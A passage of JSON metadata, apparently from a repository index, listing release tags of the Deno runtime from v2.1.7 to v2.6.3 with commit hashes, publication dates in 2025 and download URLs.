/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"co